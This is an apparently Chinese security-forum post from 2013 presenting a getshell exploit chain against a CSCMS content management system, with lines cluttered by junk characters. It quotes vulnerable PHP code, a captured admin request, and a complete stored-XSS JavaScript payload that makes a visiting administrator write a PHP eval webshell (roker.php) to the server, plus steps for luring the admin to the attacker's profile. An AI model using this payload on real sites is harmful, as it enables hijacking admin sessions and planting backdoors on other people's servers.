|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
; d- a3 q( [1 S9 x4 B官网已经修补了,所以重新下了源码
/ U" W5 u9 j: p0 N因为 后台登入 还需要认证码 所以 注入就没看了。- R6 v: M: H, Q/ ~
存在 xss& B7 M! R' F+ {- t9 Y3 S0 F4 N
漏洞文件 user/member/skin_edit.php
2 R/ q' T A0 G# _( y% W本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
& `5 a. ?1 Q' |' m ' T' ?- H, ^' W3 a0 }4 |
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>5 ?( L8 h. l `7 G5 s
$ d' ] `& M% m6 p" t3 f: ~
</textarea></td></tr>
/ |) N7 z+ S D3 F2 l7 ~ ) w% f" ]) V! V* F6 d
user/do.php
/ X% T1 P8 D- D
# D' ^ o) h7 ?5 m8 l' p: ]. ^/ e5 v; P* Z& y* e
if($op=='zl'){ //资料
% w, @9 D3 B6 z5 F* f% f
. B, g( S- Z, S5 W! H if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) D6 ^6 Y, R- \
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
7 o6 S' \) U) u( T) L5 _
, L, _+ n2 s6 h; o $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',( {/ ^) O6 O1 q) D8 R- m
: R6 l( j6 T0 S! T4 S% p7 c( ~# | CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'/ ^1 f' L8 h4 H& v+ r0 \- H* {) E
where CS_Name='".$cscms_name."'";2 v3 u! I+ G/ t0 h0 q( ]+ e
! |) x! ~4 R( C. Y
if($db->query($sql)){9 b. v% S, L" G( ~/ r/ z! i
0 h4 l( h! X( e) F& O7 {0 v- c& i
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
, H7 ~2 Z' I9 u6 M
2 `; E/ e7 H& N0 z+ C/ V) O4 X }else{5 B1 H8 |' d" q4 D
. N& L" L5 u; R
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
) D1 ~# W% ~8 d! a( H : @; q8 v- Z" v
}
2 h P, S% h8 `* a) B" J+ V$ k# w+ x( R7 o* Q* |
0 t+ @4 s5 s4 q' n2 f& O; ~4 c没有 过滤导致xss产生。; v7 W L+ M/ _ L- b9 C
后台 看了下 很奇葩的是可以写任意格式文件。。
; n' n# f. ?3 l1 H0 Q抓包。。
8 x0 S7 _+ f/ K0 w" k! T6 c; J2 l: k8 e, w; \8 x% O9 E; @
! }* b4 ]5 D+ g7 {2 R! _: z
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.11 b P7 c/ l9 O
8 n- i/ h& C& T/ ?" V) m" n- U2 lAccept: text/html, application/xhtml+xml, */*
% r# a5 G# h* T' w* R ! z& `1 ?* ?5 _# z' F; n9 [. i: O
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php* Z* T4 `+ B4 |: N( Z& O
6 U6 K3 v9 }5 l! B$ {% `Accept-Language: zh-CN
. r% |; d0 m* s" w 3 I+ H2 `1 S7 s& G
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)! L* f! `& W8 I J7 B
1 [; l6 X9 {- e; P6 h% b8 @
Content-Type: application/x-www-form-urlencoded) ]- z1 S& u& c4 ^- W" d
) E) d, i! L: b2 ^Accept-Encoding: gzip, deflate f5 G1 Y9 C W& f0 a R+ _/ v
8 `; Z6 b* e$ V+ \+ i3 s. uHost: 127.0.0.14 d Q, K; e) x4 q
7 \" g; }5 y( _+ Z, N3 A* B6 j; ~6 iContent-Length: 38
9 V& _+ M/ t6 o! d, m( w* S A
& Q6 s% l L1 A3 M! hDNT: 17 M3 T0 J2 j, t2 g" h, z$ r
" n: Z5 L1 r% O# ]
Connection: Keep-Alive
, `! J* E: l6 v3 Q- P: Q+ j; k ( T- n" A% I! r8 r! Y( a
Cache-Control: no-cache
5 i! [8 k4 K! ^7 H 2 S( s) k2 B: ?$ ?! j$ s8 M# [& z
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
1 j& X; H- q/ {4 t
7 r* j9 {* m; ^8 I
( a$ a7 H) I3 ~4 O. ?! fname=aaa.php&content=%3Cs%3E%3Ca%25%3E
% g: Y$ g5 u- p8 @3 f. P7 {
; L W2 M, n- x( I0 h
: q7 n: L U$ F* u6 [8 Z
7 m, D! I5 f5 \% v' i; g; H于是 构造js如下。
9 [- q+ |# d9 ]0 w" l/ j$ p; @% p$ `
" H6 j6 z& r" k) ?2 |$ }5 g) Y本帖隐藏的内容<script> ' `2 T( M' X* Z* Z
thisTHost = top.location.hostname;
' V& E4 N' G- t8 B1 E: M 1 h7 n! O. M0 z9 Z: j; D6 {
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";+ t3 N& {: r" W! N, V9 N
5 j& J) i' v! U- b' s
function PostSubmit(url, data, msg) { 1 t7 U) L- t6 U& M' D8 F+ t N# u
var postUrl = url;+ j0 v. G5 d4 K2 ]$ M& E+ q$ P
" k2 E2 C! |( g$ L var postData = data;
( o, ?% x; R: c) ~2 L; n var msgData = msg; " ?, _) Z8 @; |
var ExportForm = document.createElement("FORM");
R8 t! S) X+ \8 F4 x# e document.body.appendChild(ExportForm); ) c- s: h1 u4 I$ s& `5 }$ e
ExportForm.method = "POST"; : Y" m7 D7 G% n: t1 r
var newElement = document.createElement("input"); / G' _9 c" Y4 u# l! S+ l
newElement.setAttribute("name", "name"); 4 ^+ t, d. W8 N+ c9 c; J* B& d
newElement.setAttribute("type", "hidden");
) \2 ?2 g3 k! s8 { X `: i% W var newElement2 = document.createElement("input"); 4 |% @. `8 {& {* z+ W# p8 e( d
newElement2.setAttribute("name", "content");
4 @ w# T% h) H& `% c! U newElement2.setAttribute("type", "hidden"); " v* H2 q" m7 P; ^/ ]1 D9 Z i
ExportForm.appendChild(newElement);
8 H2 ?9 s7 k2 K% ]; P ExportForm.appendChild(newElement2); ( G: }6 u& d- e& |" J
newElement.value = postData;
" M$ y5 d+ s& J" X* J newElement2.value = msgData;
! a+ S! w1 E1 E3 L2 ?, F9 }" @3 F ExportForm.action = postUrl; * g% b3 b" V! f$ J! y
ExportForm.submit(); % w, Z. a2 G3 ~' x
};
( B6 E8 l, Z* V0 H9 h/ m) |1 l/ I 6 |+ \1 Z0 R$ m9 L
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
5 x1 ~- t/ J% P! G+ S3 Z5 U 5 h2 N' ~; R1 k& v$ P J! g
</script>
7 q+ w9 ]) [9 L9 Q; Z1 M+ |: t6 A9 i/ D
( a0 F/ D- j. z1 a) W o# y) K+ H% Z ^% s- k1 K7 y" w
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
8 ^! T% a, I+ o+ t, H用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改): ?( Q. ]# z' i3 y; z
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
6 e% b& T- N8 Z# z' R |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对